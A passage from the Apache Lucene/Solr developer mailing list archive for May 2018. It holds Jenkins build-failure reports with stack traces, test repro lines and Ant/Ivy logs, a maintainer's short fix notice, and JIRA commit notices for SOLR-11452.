at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at java.base/java.lang.Thread.run(Thread.java:844)


FAILED:  org.apache.solr.common.util.TestTimeSource.testEpochTime

Error Message:
NanoTimeSource time diff=368900

Stack Trace:
java.lang.AssertionError: NanoTimeSource time diff=368900
at 
__randomizedtesting.SeedInfo.see

RE: [JENKINS] Lucene-Solr-master-MacOSX (64bit/jdk1.8.0) - Build # 4647 - Failure!

2018-05-21 Thread Uwe Schindler
Should be fixed now. Sorry for noise.

-
Uwe Schindler
Achterdiek 19, D-28357 Bremen
http://www.thetaphi.de
eMail: u...@thetaphi.de

> -Original Message-
> From: Policeman Jenkins Server 
> Sent: Monday, May 21, 2018 4:56 AM
> To: sar...@apache.org; dev@lucene.apache.org
> Subject: [JENKINS] Lucene-Solr-master-MacOSX (64bit/jdk1.8.0) - Build # 4647
> - Failure!
> 
> Build: https://jenkins.thetaphi.de/job/Lucene-Solr-master-MacOSX/4647/
> Java: 64bit/jdk1.8.0 -XX:-UseCompressedOops -XX:+UseG1GC
> 
> No tests ran.
> 
> Build Log:
> [...truncated 30 lines...]
> ERROR: Step ‘Publish JUnit test result report’ failed: No test report files 
> were
> found. Configuration error?
> Email was triggered for: Failure - Any
> Sending email for trigger: Failure - Any
> Setting
> ANT_1_8_2_HOME=/Users/jenkins/tools/hudson.tasks.Ant_AntInstallation/
> ANT_1.8.2
> Setting
> ANT_1_8_2_HOME=/Users/jenkins/tools/hudson.tasks.Ant_AntInstallation/
> ANT_1.8.2
> Setting
> ANT_1_8_2_HOME=/Users/jenkins/tools/hudson.tasks.Ant_AntInstallation/
> ANT_1.8.2
> Setting
> ANT_1_8_2_HOME=/Users/jenkins/tools/hudson.tasks.Ant_AntInstallation/
> ANT_1.8.2


-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-repro - Build # 671 - Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-repro/671/

[...truncated 28 lines...]
[repro] Jenkins log URL: 
https://builds.apache.org/job/Lucene-Solr-BadApples-Tests-7.x/63/consoleText

[repro] Revision: 1e661ed97aed0cc77869b01134d80c761c6b5295

[repro] Repro line:  ant test  -Dtestcase=ScheduledMaintenanceTriggerTest 
-Dtests.method=testInactiveShardCleanup -Dtests.seed=63B30E99B809974F 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.badapples=true -Dtests.locale=it 
-Dtests.timezone=Asia/Hovd -Dtests.asserts=true -Dtests.file.encoding=ISO-8859-1

[repro] Repro line:  ant test  -Dtestcase=AutoScalingHandlerTest 
-Dtests.method=testReadApi -Dtests.seed=63B30E99B809974F -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=en-ZA 
-Dtests.timezone=America/Edmonton -Dtests.asserts=true 
-Dtests.file.encoding=ISO-8859-1

[repro] Repro line:  ant test  -Dtestcase=CollectionsAPIDistributedZkTest 
-Dtests.method=deletePartiallyCreatedCollection -Dtests.seed=63B30E99B809974F 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.badapples=true 
-Dtests.locale=en-NZ -Dtests.timezone=America/Cuiaba -Dtests.asserts=true 
-Dtests.file.encoding=ISO-8859-1

[repro] Repro line:  ant test  -Dtestcase=SearchRateTriggerTest 
-Dtests.method=testTrigger -Dtests.seed=63B30E99B809974F -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=es -Dtests.timezone=PRC 
-Dtests.asserts=true -Dtests.file.encoding=ISO-8859-1

[repro] git rev-parse --abbrev-ref HEAD
[repro] git rev-parse HEAD
[repro] Initial local git branch/revision: 
4603541d1856e889fcd76bf409dcdb4664419518
[repro] git fetch
[repro] git checkout 1e661ed97aed0cc77869b01134d80c761c6b5295

[...truncated 2 lines...]
[repro] git merge --ff-only

[...truncated 1 lines...]
[repro] ant clean

[...truncated 6 lines...]
[repro] Test suites by module:
[repro]solr/core
[repro]   AutoScalingHandlerTest
[repro]   ScheduledMaintenanceTriggerTest
[repro]   SearchRateTriggerTest
[repro]   CollectionsAPIDistributedZkTest
[repro] ant compile-test

[...truncated 3316 lines...]
[repro] ant test-nocompile -Dtests.dups=5 -Dtests.maxfailures=20 
-Dtests.class="*.AutoScalingHandlerTest|*.ScheduledMaintenanceTriggerTest|*.SearchRateTriggerTest|*.CollectionsAPIDistributedZkTest"
 -Dtests.showOutput=onerror  -Dtests.seed=63B30E99B809974F -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=en-ZA 
-Dtests.timezone=America/Edmonton -Dtests.asserts=true 
-Dtests.file.encoding=ISO-8859-1

[...truncated 9493 lines...]
[repro] Setting last failure code to 256

[repro] Failures:
[repro]   0/5 failed: 
org.apache.solr.cloud.api.collections.CollectionsAPIDistributedZkTest
[repro]   0/5 failed: org.apache.solr.cloud.autoscaling.AutoScalingHandlerTest
[repro]   5/5 failed: 
org.apache.solr.cloud.autoscaling.ScheduledMaintenanceTriggerTest
[repro]   5/5 failed: org.apache.solr.cloud.autoscaling.SearchRateTriggerTest

[repro] Re-testing 100% failures at the tip of branch_7x
[repro] ant clean

[...truncated 8 lines...]
[repro] Test suites by module:
[repro]solr/core
[repro]   ScheduledMaintenanceTriggerTest
[repro]   SearchRateTriggerTest
[repro] ant compile-test

[...truncated 3316 lines...]
[repro] ant test-nocompile -Dtests.dups=5 -Dtests.maxfailures=10 
-Dtests.class="*.ScheduledMaintenanceTriggerTest|*.SearchRateTriggerTest" 
-Dtests.showOutput=onerror  -Dtests.seed=63B30E99B809974F -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=it 
-Dtests.timezone=Asia/Hovd -Dtests.asserts=true -Dtests.file.encoding=ISO-8859-1

[...truncated 9298 lines...]
[repro] Setting last failure code to 256

[repro] Failures at the tip of branch_7x:
[repro]   5/5 failed: 
org.apache.solr.cloud.autoscaling.ScheduledMaintenanceTriggerTest
[repro]   5/5 failed: org.apache.solr.cloud.autoscaling.SearchRateTriggerTest

[repro] Re-testing 100% failures at the tip of branch_7x without a seed
[repro] ant clean

[...truncated 8 lines...]
[repro] Test suites by module:
[repro]solr/core
[repro]   ScheduledMaintenanceTriggerTest
[repro]   SearchRateTriggerTest
[repro] ant compile-test

[...truncated 3316 lines...]
[repro] ant test-nocompile -Dtests.dups=5 -Dtests.maxfailures=10 
-Dtests.class="*.ScheduledMaintenanceTriggerTest|*.SearchRateTriggerTest" 
-Dtests.showOutput=onerror  -Dtests.multiplier=2 -Dtests.slow=true 
-Dtests.badapples=true -Dtests.locale=it -Dtests.timezone=Asia/Hovd 
-Dtests.asserts=true -Dtests.file.encoding=ISO-8859-1

[...truncated 8645 lines...]
[repro] Setting last failure code to 256

[repro] Failures at the tip of branch_7x without a seed:
[repro]   3/5 failed: 
org.apache.solr.cloud.autoscaling.ScheduledMaintenanceTriggerTest
[repro]   5/5 failed: org.apache.solr.cloud.autoscaling.SearchRateTriggerTest
[repro] git checkout 4603541d1856e889fcd76bf409dcdb4664419518

[...truncated 2 lines...]
[repro] Exiting with code 256

[...truncated 6 lines...]

-

[JENKINS] Lucene-Solr-SmokeRelease-7.x - Build # 222 - Still Failing

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-SmokeRelease-7.x/222/

No tests ran.

Build Log:
[...truncated 24218 lines...]
[asciidoctor:convert] asciidoctor: ERROR: about-this-guide.adoc: line 1: 
invalid part, must have at least one section (e.g., chapter, appendix, etc.)
[asciidoctor:convert] asciidoctor: ERROR: solr-glossary.adoc: line 1: invalid 
part, must have at least one section (e.g., chapter, appendix, etc.)
 [java] Processed 2195 links (1751 relative) to 2950 anchors in 228 files
 [echo] Validated Links & Anchors via: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/build/solr-ref-guide/bare-bones-html/

-dist-changes:
 [copy] Copying 4 files to 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/package/changes

-dist-keys:
  [get] Getting: http://home.apache.org/keys/group/lucene.asc
  [get] To: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/package/KEYS

package:

-unpack-solr-tgz:

-ensure-solr-tgz-exists:
[mkdir] Created dir: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/build/solr.tgz.unpacked
[untar] Expanding: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/package/solr-7.4.0.tgz
 into 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/build/solr.tgz.unpacked

generate-maven-artifacts:

resolve:

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

resolve:

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml

r

[jira] [Commented] (SOLR-11452) TestTlogReplica.testOnlyLeaderIndexes() failure

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-11452?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482284#comment-16482284
 ] 

ASF subversion and git services commented on SOLR-11452:


Commit 4603541d1856e889fcd76bf409dcdb4664419518 in lucene-solr's branch 
refs/heads/master from [~caomanhdat]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=4603541 ]

SOLR-11452: Remove BadApple annotation


> TestTlogReplica.testOnlyLeaderIndexes() failure
> ---
>
> Key: SOLR-11452
> URL: https://issues.apache.org/jira/browse/SOLR-11452
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: Steve Rowe
>Assignee: Cao Manh Dat
>Priority: Major
> Fix For: 7.2, master (8.0)
>
>
> Reproduces for me, from 
> [https://builds.apache.org/job/Lucene-Solr-NightlyTests-master/1398]:
> {noformat}
> Checking out Revision f0a4b2dafe13e2b372e33ce13d552f169187a44e 
> (refs/remotes/origin/master)
> [...]
>[junit4]   2> NOTE: reproduce with: ant test  -Dtestcase=TestTlogReplica 
> -Dtests.method=testOnlyLeaderIndexes -Dtests.seed=CCAC87827208491B 
> -Dtests.multiplier=2 -Dtests.nightly=true -Dtests.slow=true 
> -Dtests.linedocsfile=/home/jenkins/jenkins-slave/workspace/Lucene-Solr-NightlyTests-master/test-data/enwiki.random.lines.txt
>  -Dtests.locale=el -Dtests.timezone=Australia/LHI -Dtests.asserts=true 
> -Dtests.file.encoding=ISO-8859-1
>[junit4] FAILURE 29.5s J2 | TestTlogReplica.testOnlyLeaderIndexes <<<
>[junit4]> Throwable #1: java.lang.AssertionError: expected:<2> but 
> was:<5>
>[junit4]>  at 
> __randomizedtesting.SeedInfo.seed([CCAC87827208491B:D0ADFA0F07AD3788]:0)
>[junit4]>  at 
> org.apache.solr.cloud.TestTlogReplica.assertCopyOverOldUpdates(TestTlogReplica.java:909)
>[junit4]>  at 
> org.apache.solr.cloud.TestTlogReplica.testOnlyLeaderIndexes(TestTlogReplica.java:501)
>[junit4]>  at java.lang.Thread.run(Thread.java:748)
> [...]
>[junit4]   2> NOTE: test params are: codec=CheapBastard, 
> sim=RandomSimilarity(queryNorm=false): {}, locale=el, timezone=Australia/LHI
>[junit4]   2> NOTE: Linux 3.13.0-88-generic amd64/Oracle Corporation 
> 1.8.0_144 (64-bit)/cpus=4,threads=1,free=137513712,total=520093696
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-11452) TestTlogReplica.testOnlyLeaderIndexes() failure

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-11452?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482283#comment-16482283
 ] 

ASF subversion and git services commented on SOLR-11452:


Commit 6bb2cc2acd9822861b304478637297d2b1d718bd in lucene-solr's branch 
refs/heads/branch_7x from [~caomanhdat]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=6bb2cc2 ]

SOLR-11452: Remove BadApple annotation


> TestTlogReplica.testOnlyLeaderIndexes() failure
> ---
>
> Key: SOLR-11452
> URL: https://issues.apache.org/jira/browse/SOLR-11452
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: Steve Rowe
>Assignee: Cao Manh Dat
>Priority: Major
> Fix For: 7.2, master (8.0)
>
>
> Reproduces for me, from 
> [https://builds.apache.org/job/Lucene-Solr-NightlyTests-master/1398]:
> {noformat}
> Checking out Revision f0a4b2dafe13e2b372e33ce13d552f169187a44e 
> (refs/remotes/origin/master)
> [...]
>[junit4]   2> NOTE: reproduce with: ant test  -Dtestcase=TestTlogReplica 
> -Dtests.method=testOnlyLeaderIndexes -Dtests.seed=CCAC87827208491B 
> -Dtests.multiplier=2 -Dtests.nightly=true -Dtests.slow=true 
> -Dtests.linedocsfile=/home/jenkins/jenkins-slave/workspace/Lucene-Solr-NightlyTests-master/test-data/enwiki.random.lines.txt
>  -Dtests.locale=el -Dtests.timezone=Australia/LHI -Dtests.asserts=true 
> -Dtests.file.encoding=ISO-8859-1
>[junit4] FAILURE 29.5s J2 | TestTlogReplica.testOnlyLeaderIndexes <<<
>[junit4]> Throwable #1: java.lang.AssertionError: expected:<2> but 
> was:<5>
>[junit4]>  at 
> __randomizedtesting.SeedInfo.seed([CCAC87827208491B:D0ADFA0F07AD3788]:0)
>[junit4]>  at 
> org.apache.solr.cloud.TestTlogReplica.assertCopyOverOldUpdates(TestTlogReplica.java:909)
>[junit4]>  at 
> org.apache.solr.cloud.TestTlogReplica.testOnlyLeaderIndexes(TestTlogReplica.java:501)
>[junit4]>  at java.lang.Thread.run(Thread.java:748)
> [...]
>[junit4]   2> NOTE: test params are: codec=CheapBastard, 
> sim=RandomSimilarity(queryNorm=false): {}, locale=el, timezone=Australia/LHI
>[junit4]   2> NOTE: Linux 3.13.0-88-generic amd64/Oracle Corporation 
> 1.8.0_144 (64-bit)/cpus=4,threads=1,free=137513712,total=520093696
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org